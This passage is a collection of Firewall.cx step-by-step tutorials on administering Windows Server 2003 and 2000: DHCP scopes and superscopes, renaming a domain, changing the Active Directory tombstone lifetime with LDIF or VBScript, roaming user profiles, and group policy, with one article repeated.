tk-windows-dhcp-2k3-advanced-7

The scope will inherit the server options for DNS domain name, DNS server and WINS server. Activate the scope when done.

Now we will create a superscope and place the two Building A scopes in it:

  1. On the DHCP MMC, right-click the server node and choose New Superscope
  2. When the New Superscope Wizard comes up, click Next
  3. On the next screen, you are prompted to enter a name for the scope. Enter “All of Building A, Floor 1” and click Next
  4. On the next screen, you are asked to select the scopes that will be part of the superscope. Select the scopes shown below and then click Next

tk-windows-dhcp-2k3-advanced-8

 

5. On the next screen, click Finish to complete the wizard.

Back on the DHCP MCC, you will see that the two scopes selected earlier have been placed under a new scope – “Superscope All of Building A, Floor 1”.

tk-windows-dhcp-2k3-advanced-9

 

Now when the scope titled “Building A, Floor 1” runs out of IP addresses, the server will start issuing IP addresses in “Building A, Floor 1 – Extended”.

Multicast Scopes

The most common systems and applications that use multicasting have multicast IP addresses statically configured or hard-coded in some way. However, for systems and applications that need multicast IP addresses dynamically assigned, they lease them from a MADCAP (Multicast Address Dynamic Client Allocation Protocol) server, such as Windows Server 2003.

One example of such an application that leased a multicast IP address from a MADCAP server is an old application from Windows 2000 called Phone Dialer. This application allowed the creation of video conferences that people could attend. When creating a conference, the application would lease a multicast IP address from the MADCAP server and stream to that IP address. Clients wishing to join the conference would “join” that established multicast group.

Setting up a multicast scope is similar to setting up a standard scope:

  1. On the DHCP MMC, right-click the server node and choose New Multicast Scope
  2. When the New Multicast Scope Wizard comes up, click Next
  3. On the next screen, specify a Scope Name of “Video Conferencing” and a Scope Description of “Multicast scope for conference presenters.” Afterwards, click Next

tk-windows-dhcp-2k3-advanced-10

4. On the next screen, enter 239.192.1.0 in the Start IP Address field and 239.192.1.255 in the End IP Address field. Since this scope will only service video conferences within the company, we define an IP address range in the multicast organization local scope range. Leave the TTL at 32. Click Next when done.

 

tk-windows-dhcp-2k3-advanced-11

  1. On the next screen, click Next again. No exclusions need to be defined.
  2. On the next screen, set the Days to 1 and click Next
  3. On the next screen, click Next to activate the scope.
  4. On the next screen, click Finish
  5. Back on the DHCP MMC, expand the multicast scope that we just created and select Address Pool . Notice that an exclusion range encompassing the entire pool is also created. Select it and delete it.

The DHCP server can now provide multicast IP addresses. For the most part, the multicast scope functions the same as a standard scope. One different feature is that you can set a multicast scope to automatically expire and delete itself at a certain time.

To configure this:

  1. Right-click the multicast scope and choose Properties
  2. When the Properties window comes up, click the Lifetime tab.
  3. On the Lifetime tab, select “Multicast scope expires on” and select when you would like it to expire. When this date and time is reached, the server automatically deletes the scope.

Conclusion

The Advanced DHCP configuration article continues with part 2, covering the DHCP database backup and restoration, troubleshooting the DHCP service using audit logs and finally DHCP Migration.

To continue with our article, please click here: Windows 2003 Advanced DHCP Server Configuration - Part 2.

  • Hits: 56196

Windows 2003 DHCP Server Installation & Configuration

DHCP (Dynamic Host Configuration Protocol) is a protocol that allows clients on a network to request network configuration settings from a server running the DHCP server service which, in our case, will be Windows Server 2003. Additionally the protocol allows the clients to self-configure those network configuration settings without the intervention of an administrator. Some of the settings that a DHCP server can provide to its clients include the IP addresses for the DNS servers, the IP addresses for the WINS servers, the IP address for the default gateway (usually a router) and, of course, an IP address for the client itself.

This article will discuss and walk you through the steps of installing and configuring DHCP on a Windows Server 2003 member server, specifically focusing on setting up a scope and its accompanying settings. The same configuration can be applied to a standalone server even though the step-by-step details differ slightly. The upcoming 'Advanced DHCP Server Configuration on Windows 2003' article will discuss other DHCP options and features such as superscopes, multicast scopes, dynamic DNS, DHCP Backup and more.

While our articles make use of specific IP addresses and network settings, you can change these settings as needed to make them compatible with your LAN – This won't require you to make changes to your LAN, but you'll need to have a slightly stronger understanding of DHCP and TCP/IP.

Assigning the Server a Static IP Address

Before we install the DHCP server service on Windows Server 2003, we need to assign the Windows server a static IP address. To do this:

1. Go to Start > Control Panel > Network Connections , right-click Local Area Connection and choose Properties .

2.  When the Local Area Connection Properties window comes up, select Internet Protocol (TCP/IP) and click the Properties button.

3.  When the Internet Protocol (TCP/IP) window comes up, enter an IP address , subnet mask and default gateway IP address that is compatible with your LAN.

We've configured our settings according to our network, as shown below:

tk-windows-dhcp-2k3-basic-1

4. Enter 192.168.0.252 for the Preferred DNS server and 192.168.1.252 for the Alternate DNS server. The Preferred and Alternate DNS server IP addresses are optional for the functionality of the DHCP server, but we will populate them since you typically would in a real-world network. Usually these fields are populated with the IP addresses of your Active Directory domain controllers.

5. After filling out those fields, click OK and OK to save and close all windows.

Install DHCP Server Service on Windows Server 2003

Our server now has a static IP address and we are now ready to install the DHCP server service. To do this:

1. Go to Start > Control Panel > Add or Remove Programs .

2. When the Add or Remove Programs window launches, click Add/Remove Windows Components in the left pane.

3. When the Windows Components Wizard comes up, scroll down and highlight Networking Services and then click the Details button.

tk-windows-dhcp-2k3-basic-2

4. When the Networking Services window comes up, place a check mark next to Dynamic Host Configuration Protocol (DHCP) and click OK and OK again.

tk-windows-dhcp-2k3-basic-3

Note that, during the install, Windows may generate an error claiming that it could not find a file needed for DHCP installation. If this happens, insert your Windows Server 2003 CD into the server's CD-ROM drive and browse to the i386 directory. The wizard should automatically find the file and allow you to select it. After that, the wizard should resume the installation process.

Configure DHCP on Windows Server 2003

DHCP has now been successfully installed and we are ready to configure it. We will create a new scope and configure some of the scope's options. To begin:

1. Launch the DHCP MMC by going to Start > Administrative Tools > DHCP .

Currently, the DHCP MMC looks empty and the server node in the left pane has a red arrow pointing down. Keep that in mind because it will be significant later on.

tk-windows-dhcp-2k3-basic-4

2. Right-click the server node in the left pane and choose New Scope . This will launch the New Scope Wizard.

3. On the New Scope Wizard, click Next .

4. Specify a scope name and scope description. For the scope Name , enter “ Building A, Floor 1 .” For the scope Description , enter “ This scope is for Floor 1 of Building A .” Afterwards, click Next .

tk-windows-dhcp-2k3-basic-5

The scope name can be anything, but we certainly want to name it something that describes the scope's purpose. The scope Description is not required. It is there in case we needed to provide a broader description of the scope.

5. Specify an IP address range and subnet mask. For the Start IP address enter 192.168.0.1, for the End IP address enter 192.168.0.254 . Finally, specify a subnet mask of 255.255.255.0 and click Next.

Specifying the IP address range of a scope requires some knowledge of subnetting. Each scope in a DHCP server holds a pool of IP addresses to give out to clients, and the range of IP addresses must be within the allowed range of the subnet (that you specify on the subnet mask field).

For simplicity we entered a classful, class C IP address range from 192.168.0.1 to 192.168.0.254. Notice that the range encompasses the IP address of our server, the DNS servers and the default gateway, meaning that the DHCP server could potentially assign a client an IP address that is already in use! Do not worry -- we will take care of that later.

tk-windows-dhcp-2k3-basic-6

 

6. Specify IP addresses to exclude from assignment. For the Start IP address , enter 192.168.0.240 and for the End IP address enter 192.168.0.254 , click Add , and then click Next.

tk-windows-dhcp-2k3-basic-7

 

Certain network devices, such as servers, will need statically configured IP addresses. The IP addresses may sometimes be within the range of IP addresses defined for a scope. In those cases, you have to exclude the IP addresses from being assigned out by DHCP.

We have the opportunity here to define those IP addresses that are to be excluded. We specified IP addresses 192.168.0.240 to 192.168.0.254 to ensure we've included our servers plus a few spare IP addresses for future use.

7. Specify the lease duration for the scope. Verify that Days is 8 and click Next.

The lease duration is how long clients should keep their IP addresses before having to renew them.

tk-windows-dhcp-2k3-basic-8

There are a few considerations at this point. If a short lease duration is configured, clients will be renewing their IP addresses more frequently. The result will be additional network traffic and additional strain on the DHCP server. On the other hand if a long lease duration is configured, IP addresses previously obtained by decommissioned clients would remain leased and unavailable to future clients until the leases either expire or are manually deleted.

Additionally if network changes occur, such as the implementation of a new DNS server, those clients would not receive those updates until their leases expire or the computers are restarted.

As Microsoft states, “lease durations should typically be equal to the average time the computer is connected to the same physical network.” You would typically leave the default lease duration in an environment where computers are rarely moved or replaced, such as a wired network. In an environment where computers are often moved and replaced, such as a wireless network, you would want to specify a short duration since a new wireless client could roam within range at any time.

8. Configure DHCP Options. Make sure “ Yes, I want to configure these settings now ” is selected and click Next to begin configuring DHCP options.

DHCP options are additional settings that the DHCP server can provide to clients when it issues them with IP addresses. These are the other settings that help clients communicate on the network. In the New Scope Wizard we can only configure a few options but from the DHCP MMC we have several more options.

9. Specify the router IP address. Enter 192.168.0.254 as the IP address of the subnet's router, click Add , and then click Next .

The first option we can configure is the IP address for the subnet's router for which this scope is providing IP addresses. Keep in mind that this IP address must be in the same network as the IP addresses in the range that we created earlier.

tk-windows-dhcp-2k3-basic-9

 

10. Configure domain name and DNS servers. On the next page, enter “firewall.cx" for the domain name. Then enter 192.168.0.252 for the IP address of a DNS server, click Add , enter 192.168.1.252 as the IP address for another DNS server, and click Add again. When finished, click Next.

If you had a DNS infrastructure in place, you could have simply typed in the fully qualified domain name of the DNS server and clicked Resolve .

The DNS servers will be used by clients primarily for name resolution, but also for other purposes that are beyond the scope of this article. The DNS domain name will be used by clients when registering their hostnames to the DNS zones on the DNS servers (covered in the 'Advanced DHCP Server Configuration on Windows 2003' article).

tk-windows-dhcp-2k3-basic-10

 

11. Configure WINS servers. On the next screen, enter 192.168.0.251 as the IP address for the first WINS server, click Add , enter 192.168.1.251 as the IP address for the second WINS server, click Add again, and then click Finish .

tk-windows-dhcp-2k3-basic-11

 

12. Finally, the wizard asks whether you want to activate the scope. For now, choose “ No, I will activate this scope later ” and click Next and then Finish to conclude the New Scope Wizard and return to the DHCP MMC.

At this point we almost have a functional DHCP server. Let us go ahead and expand the scope node in the left pane of the DHCP MMC to see the new available nodes:

•  Address Pool – Shows the IP address range the scope offers along with any IP address exclusions.

•  Address Leases – Shows all the leased IP addresses.

•  Reservations – Shows the IP addresses that are reserved. Reservations are made by specifying the MAC address that the server would “listen to” when IP address requests are received by the server. Certain network devices, such as networked printers, are best configured with reserved IP addresses rather than static IP addresses.

•  Scope Options – Shows configured scope options. Some of the visible options now are router, DNS, domain name and WINS options.

•  Server Options – Shows configured server options. This is similar to scope options except that these options are either inherited by all the scopes or overridden by them (covered in 'Advanced DHCP Server Configuration on Windows 2003' article).

Earlier, we only defined exclusions for our servers, router plus a few more spare IP addresses. In case you need to exclude more IP addresses, you can do it at this point by following these instructions:

13. Select and right-click Address Pool and choose New Exclusion Range.

14. When the Add Exclusion window comes up, enter the required range and then click Add. In our example, we've excluded the addition range 192.168.0.230 - 192.168.0.232.

tk-windows-dhcp-2k3-basic-12

Notice that the server node and scope node still has a red arrow pointing down. These red arrows pointing down mean that the server and scope are not “turned on”.

The concept of “turning on” the scope is called “activating” and the concept of “turning on” the server for DHCP service is called “authorizing”. Security has some influence in the concept of authorizing a DHCP server and, to authorize a DHCP server, you must be a member of the Enterprise Admins Active Directory group.

15. Right-click the server (server001.firewall.cx) and choose Authorize , then right-click the scope (Building A, Floor 1) and choose Activate . If the red arrows remain, refresh the MMC by going to Action > Refresh .

tk-windows-dhcp-2k3-basic-13

Congratulations! At this point, you should have a working DHCP server capable of providing IP addresses!

  • Hits: 103862

Renaming Windows 2000 Domain Name

Sometimes renaming a domain is an essential business requirement. There are many situations, such as mergers, change of company name or migration from a test environment to a production environment, that require you to change the existing domain name.

However, changing a domain name in Windows Server 2000 is not a simple or straightforward process. It is a time consuming and complex procedure, which requires extensive work.

The renaming of a Windows 2000 domain may impact other server applications that are running in the domain, such as Exchange Server and other custom applications that are closely integrated with Active Directory and use hard coded NETBIOS names.

The major task in renaming a domain is to revert the Windows Server 2000 to Windows NT and then upgrade it to Windows Server 2000 with a new DNS (FQDN) name. If there is more than one domain controller in the domain then all the Windows 2000 domain controllers must be demoted to member servers before renaming the desired domain controller.

Requirements

Renaming the Windows 2000 domain is only possible if the default functional level of the domain is set to mixed mode. The Windows 2000 mixed mode function level means that there is at least one NT 4.0 BDC in the domain/Forest. The functional level of the domain must be in mixed mode because you need use NT 4.0 BDC to complete the renaming procedure.

Note: If the default functional level of the domain is set to native mode, you cannot revert to mixed mode and cannot rename the domain.

If you have one or more child domains then you have to downgrade all the child domains to Windows NT before downgrading the parent domain. You need to then upgrade the parent domain with new FQDN and then upgrade the child domain/s.

Steps To Be Taken

To rename a Windows 2000 domain, you need to follow these steps:

1. Verify that at least one Windows NT 4.0 BDC, having Service Pack 6 or 6a installed on it, exists in the domain.

2. Backup all the domain controllers in the domain.

3. If required, install another Windows NT 4.0 BDC in the domain and force replication to ensure that the backup of all the security information, domain user accounts and SAM database exists. You can use net accounts /sync command on the Windows NT 4.0 BDC to force replication.

4. If you have just one domain controller, simply isolate it from the network by removing all the cables.

If you have more than one domain controller, you need to demote all the Windows 2000 domain controllers to member servers, leaving just one Windows 2000 domain controller, by using dcpromo command.

Then isolate the last Windows 2000 domain controller after ensuring that a Windows NT 4.0 BDC is present on the network.

5. Demote the last Windows 2000 domain controller by using dcpromo command ensuring that the last domain controller option is selected as the domain option.

Note: To run dcpromo command on the last Windows 2000 domain controller, connect it to an isolated active hub because dcpromo command requires an active connection.

6. Promote Windows NT BDC to a PDC and then upgrade it to Windows 2000.

7. Provide the desired domain name at the time of Active Directory installation.

8. Promote all the demoted member servers back to Windows 2000 domain controllers by running dcpromo on them.

Article Summary

In this article we have seen the different scenarios and methods of renaming a Windows 2000 domain. We have learnt that renaming a Windows 2000 domain is a fairly complex process. We must keep in mind that changing domain name in Windows 2000 should not be performed unless it is absolutely necessary.

Careful planning while deciding on the FQDN/DNS name of the Windows 2000 domain at the time of installation can avoid the trouble of renaming a Windows 2000 domain.

If you have found the article useful, we would really appreciate you sharing it with others by using the provided services on the top left corner of this article. Sharing our articles takes only a minute of your time and helps Firewall.cx reach more people through such services.

  • Hits: 22797

Active Directory Tombstone Lifetime Modification

Tombstone is a container object that contains the deleted objects from Active Directory. Actually when an object is deleted from Active Directory, it is not physically removed from the Active Directory for some days. Rather, the Active Directory sets the ‘isDeleted' attribute of the deleted object to TRUE and move it to a special container called Tombstone, previously known as CN=Deleted Objects.

The tombstones cannot be accessed through Windows Directories or through Microsoft Management Console (MMC) snap-ins. However, tombstones are available to Directory Replication Process, so that the tombstones are replicated to all the domain controllers in the domain. This process ensures that the object deleted is deleted from all the computers throughout the Active Directory.

The tombstone lifetime attribute is the attribute that contains a time period after which the object is physically deleted from the Active Directory. The default value for the tombstone lifetime attribute is 60 days. However, you can change this value if required. Usually tombstone lifetime value is kept longer than the expected replication latency between the domain controllers so that the tombstone is not deleted before the objects are replicated across the forest.


The tombstone lifetime attribute remains same on all the domain controllers and it is deleted from all the servers at the same time. This is because the expiration of a tombstone lifetime is based on the time when an object was deleted logically from the Active Directory, rather than the time when it is received as a tombstone on a server through replication.

Changing Tombstone Lifetime Attribute

The tombstone lifetime attribute can be modified in three ways: Using ADSIEdit tool, using LDIF file, and through VBScript.

Using ADSIEdit Tool

The easiest method to modify tombstone lifetime in Active Directory is by using ADSIEdit. The ADSIEdit tool is not installed automatically when you install Windows Server 2003. You need to install it separately by installing support tools from Windows Server 2003 CD.
If you haven't got your CD's in hand, you can simply download the Windows 2003 SP1 Support Tools from Firewall.cx here.
To install ADSIEdit tool and to modify tombstone lifetime in Active Directory using this tool, you need to:

  1. Insert the Windows Server 2003 CD.
  2. Browse the CD to locate the Support\Tools directory.
  3. Double-click the suptools.msi to proceed with the installation of support tools.
  4. Select Run command from the Start menu.
  5. Type ADSIEdit.msc to open the ADSI Editor, as shown below:

tk-windows-tombstone-1

The ADSI Edit window appears:
tk-windows-tombstone-2

6. Expand Configuration node then subsequently expand CN=Configuration, DC Firewall, DC=cx node.
7. Expand CN-Services node.
8. Drill down to CN=Directory Service under CN Windows NT , as shown in the figure below:
tk-windows-tombstone-3

9. Right-click CN=Directory Service and select Properties from the menu that appears
The CN=Directory Service Properties window appears, as shown below:
10. Double-click the tombstoneLifetime attribute in the Attributes list.
tk-windows-tombstone-4

The Integer Attribute Editor window appears, as shown below:
tk-windows-tombstone-5

11. Set the number of days that tombstone objects should remain in Active Directory in the Value field.
12. Click OK .
The Tombstone Lifetime has now been successfully changed.

Other Ways Of Changing The Tombstone Lifetime Attribute

Using an LDIF file

To change the tombstone lifetime attribute using LDIF file, you need to create a LDIF file using notepad and then execute it using LDIFDE tool. To change the tombstone lifetime attribute using LDIF file, you need to:
1. Create a text file using notepad with the following content:

dn: cn=Directory Service,cn=Windows NT,cn=Services,cn=Configuration, , <ForestRootDN> changetype: modify
replace: tombstoneLifetime
tombstoneLifetime: <NumberOfDays>

2. Provide the appropriate values in the text between <>. For example put the name of your Active Directory Forest Root domain in the <ForestRootDN> and put the number of days you want to set for tombstone lifetime in <NumberOfDays>.

3. Don't forget to put "-" on the last line.

4. Save the file with .ldf extension.

5. Open the Command Prompt and type the following command on the command prompt:
c:\> Ldifde –v –I –f <Path to tombstoneLifetime.ldf> The Tombstone Lifetime is successfully changed.

Using a VBScript

To change tombstone lifetime using VBScript, you need to type the following code with appropriate values and execute the script.

intTombstoneLifetime = <NumberOfDays>  
set objRootDSE = GetObject("LDAP://RootDSE")
set objDSCont = GetObject("LDAP://cn=Directory Service,cn=Windows NT," & _ "cn=Services," & objRootDSE.Get("configurationNamingContext") )
objDSCont.Put "tombstoneLifetime", intTombstoneLifetime
objDSCont.SetInfo
WScript.Echo "The tombstone lifetime is set to " & _ intTombstoneLifetime

Article Summary

This article explained what the Active Directory Tombstone attribute is and how you can change it to control delete operations performed by the Active Directory replication process. We covered three different methods in great detail to give all the necessary information so these actions can be covered by any Windows Administrator.

  • Hits: 56753

Configuring Windows Server Roaming Profiles

Windows roaming profiles allow the mobile users of a company to always work with their personal settings from any network computer in a domain. Roaming profiles are a collection of personal user settings of a user, saved at a central location on a network.

These settings and configurations are recovered on any network computer as soon as users log in with their credentials.

The roaming user profiles functionality is very useful because it allows mobile users to log on to a variety of computers located at different places and get the same look and feel of their own personalized desktops. However, roaming user profiles in Windows Server 2003 does not allow you to use encrypted files.

A roaming profile is made up of folders that appear under the <username> folder under Documents and Setting, as shown below:

tk-windows-roaming-profiles-1

The detailed description of each folder is as follows:

  • Desktop: This folder contains all the files, folders, and shortcuts data that is responsible for the appearance of your desktop screen.
  • Favorites: This folder contains the shortcuts of the favorite and frequently visited websites of the user.
  • Local Settings: This folder contains temporary files, history, and the application data.
  • My Documents: This folder contains documents, music, pictures, and other items.
  • The Recent: This folder contains the most recently accessed files and folders by the user.
  • Start Menu: This folder contains the Start menu items.
  • Cookies: This folder contains all cookies stored on the user's computer.
  • NetHood: This folder contains shortcuts to sites in My Network Places .
  • PrintHood: This folder contains the shortcuts of printers configured for the user's computer.
  • Application Data: This folder contains the program-specific and the security settings of the applications that the user has used.
  • Templates: This folder contains the templates for applications such as Microsoft Word and Excel.
  • SendTo: This folder contains the popular Send To destination on right-clicking a menu.

Creating Roaming User Profiles

You can create roaming user profiles on Windows NT Server 4.0, Windows 2000 Server, or Windows Server 2003 based computers. In addition, you can use Windows NT Workstation 4.0, Windows XP Professional, or Windows 2000 Professional based computer that is running Windows NT Server Administration Tools to create roaming user profiles.

The three major steps involved in creating a roaming user profile include creating a temporary user profile on a local computer, copying that profile to a network server, and then defining the user's profile location through the group policy.

To create a roaming user profile, follow the steps given below:

1. Log on as Administrator, or as a user of local administrator group or Account Operators local group in the domain:

tk-windows-roaming-profiles-2

 

2. Open Administrative Tools in the Control Panel and then click Active Directory Users and Computers, as shown above.

3. Click Users folder under Local Users and Groups node, Right-click Users and then click New User in the menu that appears, as shown below:

Note: If you are using Active Directory then click Users folder under Active Directory Users and Computers node.

tk-windows-roaming-profiles-3

The New User dialog box appears as shown below.

 

4. Provide the User logon name and the Password for the user for whom the roaming profile is being created in their respective fields. Click on Next:

tk-windows-roaming-profiles-4

 

5. Enter the user password and clear the User must change password at next logon option as shown below:

tk-windows-roaming-profiles-4a

 

6. Click Create , click Close, and then quit the Computer Management snap-in.

7. Log off the computer and then Log on to your workstation using the user account that you have just created on your server.

8. Verify that a folder with the user name is created under the Documents and Settings folder, as shown below:

tk-windows-roaming-profiles-5

9. Configure your desktop by adding shortcuts and modifying its appearance.

8. Configure the Start menu by adding desired options to it.

10. Log off.

Copying The Profile To Your Server

A temporary profile with all the required settings is configured on your local computer. You need to now copy this local profile to a network server which can be accessed centrally by all the computers.

Try not to user a domain controller for this purpose because domain controllers have many other tasks to do, so it is better to keep them away from this task. You can however, choose a member server for this purpose. Make sure that the member server you choose is regularly backed up otherwise you may loose all your roaming profiles.

To copy the profile to a network server, you need to:

1. Log on as Administrator and then create a Profile folder on a network server.

Windows uses Profile folder by default to store roaming user profiles. Although you can give a different name to this folder but this folder is traditionally named as Profile folder.

2. Share the Profile folder and give everyone the full control at share level.

3. Open Control Panel , and then click System icon. The System Properties dialog box appears.

4. Click Advanced tab, and then click Settings under User Profiles section, as shown below:

tk-windows-roaming-profiles-6

 The User Profiles dialog box appears.

 

5. Click the temporary user profile that you had created and then click Copy To, as shown in the Figure below:

tk-windows-roaming-profiles-7

 

Next, The Copy To dialog box appears, a shown below.

6. Type the network path of the Profile folder in the Copy Profile To field.

A folder with the temporary user name will be created automatically under the Profiles folder.

7. Click Change.

tk-windows-roaming-profiles-8

 

8. The Select User or Group dialog box appears.

9. Enter the name of the temporary user that you have created.

10. Click OK four times on all the windows that you have opened recently.

11. Open Administrative Tools in the Control Panel and then click Computer Management, as shown in the second screenshot in this article.

12. Click Users folder under Local Users and Groups node, as shown below:

13. Double-click the temporary user account that you had created.

14. The Properties window for the user account appears as shown in the figure below.

15. Click the Profile tab and then type the path of Profile folder that you had created on a network server in the Profile path field:

tk-windows-roaming-profiles-9

 

16. Click OK and then quit the Computer Management snap-in.

This completes the process of creating a roaming user profile. Now when the user logs into any computer in the domain using his/her credentials, a copy of the user profile stored on the network will be copied to that computer with all the latest changes that the user might have made.

Usually when there are a few roaming profiles enabled in a domain then the login and log off become extremely slow. This happens mostly when roaming users save large files on their computers. Each time a logs off or logs on to a different computer the large files take long time to save on the network and recover from the network.

The solution to this problem is to use Folder Redirection along with roaming user profiles. The Folder redirection feature allows you to redirect folders such as Application Data, Desktop, My Documents, and Start Menu to a different network location. These folders are typically used to save the large files. When Folder Redirection is used then Windows understand that those particular folders need not be touched each time a roaming user logs in/off. These folders will only be touched by Windows when a user actually tries to open a file from them.

Another solution to control the growing size user profiles is to create Mandatory User Profiles for the users. However, you can use such profiles when you want to provide identical desktop configurations to all the roaming users. When mandatory user profiles are configured for the users, the users are not allowed to change their profile settings and thus the profiles size always remain manageable. To make a roaming user profile mandatory, you need to rename the Ntuser.dat file as Ntuser.man in the user's profile folder.

Article Summary

Roaming user profiles are simply collections of settings and configurations that are stored on a network location for each user. Once you perform some fairly simple configurations, every time a user logs on to a machine in your domain with his domain credentials, that user's settings will follow him and automatically be applied to his log-on session for that particular machine.

This article covered the creation of roaming user profiles in a Windows server active directory.

If you have found the article useful, we would really appreciate you sharing it with others by using the provided services on the top left corner of this article. Sharing our articles takes only a minute of your time and helps Firewall.cx reach more people through such services.

  • Hits: 50280

Configuring Domain Group Policy for Windows 2003

Windows 2003 Group Policies allow the administrators to manage a group of people accessing a resource efficiently. The group policies can be used to control both the users and computers.

They give better productivity to administrators and save their time by allowing them to manage all the users and computers centrally in just one go.

The group policies are of two types, Local Group Policy and Domain-based Group Policy. As the name suggests, the Local Group Policies allow the local administrator to manage all the users of a computer to access the resources and features available on the computer. For example an administrator can remove the use of Run command from the start menu. This will ensure that the users will not find Run command on that computer.

The Domain-based Group Policies on the other hand allow the domain/enterprise administrators to manage all the users and the computers of a domain/ forest centrally. They can define the settings and the allowed actions for users and computers across sites, domains, and OUs through group policies.

There are more than 2000 pre-created group policy settings available in Windows Server 2003. A default group policy already exists. You only need to modify it by setting values of different policy settings according to your specific requirements. You can also create new group policies to meet your specific business requirements. The group policies allow you to implement:

  • Registry based settings: Allows you to create a policy to administer operating system components and applications.
  • Security settings: Allows you to set security options for users and computers to restrict them to run files based on path, hash, publisher criteria, or URL zone.
  • Software restrictions: Allows you to create a policy that would restrict users to run unwanted applications and protect computers against virus and hacking attack.
  • Software distribution and installation: Allows you to either assign or publish software application to domain users centrally with the help of a group policy.
  • Automation of tasks using computer and User Scripts
  • Roaming user profiles: Allow mobile users to see a familiar and consistent desktop environment on all the computers of the domain by storing their profile centrally on a server.
  • Internet Explorer maintenance: Allow administrators to manage the IE settings of the user's computers in a domain by setting the security zones, privacy settings, and other parameters centrally with the help of group policy.

Configuring a Domain-Based Group Policy

Just as you used group policy editor to create a local computer policy, to create a domain-based group policy you need to use Active Users and Computers snap-in from where you can open the GPMC.

Follow the steps below to create a domain-based group policy

1. Select Active Directory Users and Computers tool from the Administrative Tools.

2. Expand Active Directory Users and Computers node, as shown below.

3. Right-click the domain name and select Properties from the menu that appears:

tk-windows-gp-domain-1

The properties window of the domain appears.

4. Click the Group Policy tab.

5. The Group Policy tab appears with a Default Domain Policy already created in it, as shown in here:

tk-windows-gp-domain-2

 

You can edit the Default Domain Policy or create a new policy. However, it is not recommended to modify the Default Domain Policy for regular settings.

We will select to create a new policy instead. Click New to create a new group policy or group policy object. A new group policy object appears below the Default Domain Policy in the Group Policy tab, as shown below:

tk-windows-gp-domain-3

 

Once you rename this group policy, you can either double-click on it, or select it and click Edit.

You'll next be presented with the Group Policy Object Editor from where you can select the changes you wish to apply to the specific Group Policy:

tk-windows-gp-domain-4

 

In this example, we have selected to Remove Run menu from Start Menu as shown above. Double-click on the selected setting and the properties of the settings will appear. Select Enabled to enable this setting. Clicking on Explain will provide plenty of additional information to help you understand the effects of this setting.

tk-windows-gp-domain-5

When done, click on OK to save the new setting.

Similarly you can set other settings for the policy. After setting all the desired options, close the Group Policy Object editor . You new group policy will take effect.

Article Summary

Domain Group Policies give the administrator great control over its domain users by enhancing security levels and restricting access to specific areas of the operating system. These policies can be applied to every organisation unit, group or user in the active directory or selectively to the areas you need. This article shows you how to create a domain group policy that can then be applied as required.

If you have found the article useful, we would really appreciate you sharing it with others by using the provided services on the top left corner of this article. Sharing our articles takes only a minute of your time and helps Firewall.cx reach more people through such services.

Windows 2003 Group Policies allow the administrators to manage a group of people accessing a resource efficiently. The group policies can be used to control both the users and computers.

They give better productivity to administrators and save their time by allowing them to manage all the users and computers centrally in just one go.

The group policies are of two types, Local Group Policy and Domain-based Group Policy. As the name suggests, the Local Group Policies allow the local administrator to manage all the users of a computer to access the resources and features available on the computer. For example an administrator can remove the use of Run command from the start menu. This will ensure that the users will not find Run command on that computer.

The Domain-based Group Policies on the other hand allow the domain/enterprise administrators to manage all the users and the computers of a domain/ forest centrally. They can define the settings and the allowed actions for users and computers across sites, domains, and OUs through group policies.

There are more than 2000 pre-created group policy settings available in Windows Server 2003/ Windows XP. A default group policy already exists. You only need to modify it by setting values of different policy settings according to your specific requirements. You can also create new group policies to meet your specific business requirements. The group policies allow you to implement:

Registry based settings : Allows you to create a policy to administer operating system components and applications.

Security settings : Allows you to set security options for users and computers to restrict them to run files based on path, hash, publisher criteria, or URL zone.

Software restrictions : Allows you to create a policy that would restrict users to run unwanted applications and protect computers against virus and hacking attack.

Software distribution and installation : Allows you to either assign or publish software application to domain users centrally with the help of a group policy.

Automation of tasks using computer and User Scripts

Roaming user profiles : Allow mobile users to see a familiar and consistent desktop environment on all the computers of the domain by storing their profile centrally on a server.

Internet Explorer maintenance : Allow administrators to manage the IE settings of the user's computers in a domain by setting the security zones, privacy settings, and other parameters centrally with the help of group policy.





Configuring a Domain-Based Group Policy

Just as you used group policy editor to create a local computer policy, to create a domain-based group policy you need to use Active Users and Computers snap-in from where you can open the GPMC .



Follow the steps below to create a domain-based group policy

1. Select Active Directory Users and Computers tool from the Administrative Tools.
2. Expand Active Directory Users and Computers node, as shown below.
3. Right-click the domain name and select Properties from the menu that appears.





The properties window of the domain appears.

4. Click the Group Policy tab.
5. The Group Policy tab appears with a Default Domain Policy already created in it, as shown in here:



You can edit the Default Domain Policy or create a new policy. However, it is not recommended to modify the Default Domain Policy for regular settings.

We will select to create a new policy instead. Click New to create a new group policy or group policy object. A new group policy object appears below the Default Domain Policy in the Group Policy tab, as shown below:



Once you rename this group policy, you can either double-click on it, or select it and click Edit.

You'll next be presented with the Group Policy Object Editor from where you can select the changes you wish to apply to the specific Group Policy:



In this example, we have selected to Remove Run menu from Start Menu as shown above. Double-click on the selected setting and the properties of the settings will appear. Select Enabled to enable this setting. Clicking on Explain will provide plenty of additional information to help you understand the effects of this setting.





When done, click on OK to save the new setting.

Similarly you can set other settings for the policy. After setting all the desired options, close the Group Policy Object editor . You new group policy will take effect.



Article Summary

Domain Group Policies give the administrator great control over its domain users by enhancing security levels and restricting access to specific areas of the operating system. These policies can be applied to every organisation unit, group or user in the active directory or selectively to the areas you need. This article shows you how to create a domain group policy that can then be applied as required.

If you have found the article useful, we would really appreciate you sharing it with others by using the provided services on the top left corner of this article. Sharing our articles takes only a minute of your time and helps Firewall.cx reach more people through such services.



About the writers

GFI Software provides the single best source of network security, content security and messaging software for small to medium sized businesses.

Alan Drury is member of the Firewall.cx team and senior engineer at a large multinational company, supporting complex large Windows networks.

Chris Partsenidis is a CCNA certified Engineer, MCP, LCP, Founder & Senior Editor of Firewall.cx

  • Hits: 119281

Configuring Local Group Policy for Windows 2003

Windows 2003 Group Policies allow the administrators to efficiently manage a group of people accessing a resource. Group policies can be used to control both the users and the computers.

They give better productivity to administrators and save their time by allowing them to manage all the users and computers centrally in just one go.

Group policies are of two types, Local Group Policy and Domain-based Group Policy. As the name suggests, Local Group Policies allow the local administrator to manage all the users of a computer to access the resources and features available on the computer. For example an administrator can remove the use of the Run command from the start menu. This will ensure that the users will not find Run command on that computer.

Domain-based Group Policies allow the domain / enterprise administrators to manage all the users and the computers of a domain / forest centrally. They can define the settings and the allowed actions for users and computers across sites, domains and OUs through group policies.

There are more than 2000 pre-created group policy settings available in Windows Server 2003 / Windows XP. A default group policy already exists. You only need to modify the values of different policy settings according to your specific requirements. You can create new group policies to meet your specific business requirements. Group policies allow you to implement:

Registry based settings: Allows you to create a policy to administer operating system components and applications.

